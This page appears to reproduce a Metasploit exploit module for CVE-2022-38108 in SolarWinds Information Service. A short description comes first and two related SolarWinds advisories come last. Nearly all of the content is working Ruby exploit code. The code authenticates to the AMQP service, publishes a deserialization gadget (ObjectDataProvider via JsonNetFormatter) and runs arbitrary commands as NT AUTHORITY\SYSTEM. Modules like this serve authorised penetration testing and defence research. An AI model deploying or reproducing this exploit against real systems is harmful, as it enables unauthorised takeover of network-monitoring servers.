Headline
SolarWinds Information Service (SWIS) Remote Command Execution
The SolarWinds Information Service (SWIS) is vulnerable to remote code execution by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/proto/amqp/version_0_9_1'class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking def initialize super( 'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE', 'Description' => %q{ The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM. }, 'Author' => [ 'Justin Hong', # vulnerability research, Trend Micro 'Lucas Miller', # vulnerability research, Trend Micro 'Piotr Bazydło', # vulnerability discovery, reported to ZDI 'Spencer McIntyre' # metasploit module ], 'Arch' => ARCH_CMD, 'Platform' => 'win', 'References' => [ [ 'CVE', '2022-38108' ], [ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ], [ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ] ], 'DefaultOptions' => { 'WfsDelay' => 10 }, 'Targets' => [ [ 'Automatic', {} ] ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => '2022-10-19', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) register_options([ Opt::RHOST, Opt::RPORT(5671), OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']), OptString.new('PASSWORD', [true, 'The password to authenticate with', '']) ]) register_advanced_options( [ OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]), Opt::SSLVersion ] ) end def peer rhost = datastore['RHOST'] rport = datastore['RPORT'] if Rex::Socket.is_ipv6?(rhost) "[#{rhost}]:#{rport}" else "#{rhost}:#{rport}" end end def print_status(msg) msg = "#{peer} - #{msg}" super end def exploit amqp_client = Rex::Proto::Amqp::Version091::Client.new( datastore['RHOST'], port: datastore['RPORT'], context: { 'Msf' => framework, 'MsfExploit' => self }, ssl: datastore['SSL'], ssl_version: datastore['SSLVersion'] ) unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD']) fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.") end print_status('Successfully connected to the remote server.') channel = amqp_client.channel_open vprint_status('Successfully opened a new channel.') channel.basic_publish( routing_key: 'SwisPubSub', message: ::Msf::Util::DotNetDeserialization.generate( payload.encoded, gadget_chain: :ObjectDataProvider, formatter: :JsonNetFormatter ), properties: { message_type: 'System.Windows.Data.ObjectDataProvider' } ) print_status('Successfully published the message to the channel.') channel.close amqp_client.connection_close rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e fail_with(Failure::UnexpectedReply, e.message) rescue Rex::Proto::Amqp::Error::AmqpError => e fail_with(Failure::Unknown, e.message) ensure amqp_client.close endend
Related news
Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3 and previous.
SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.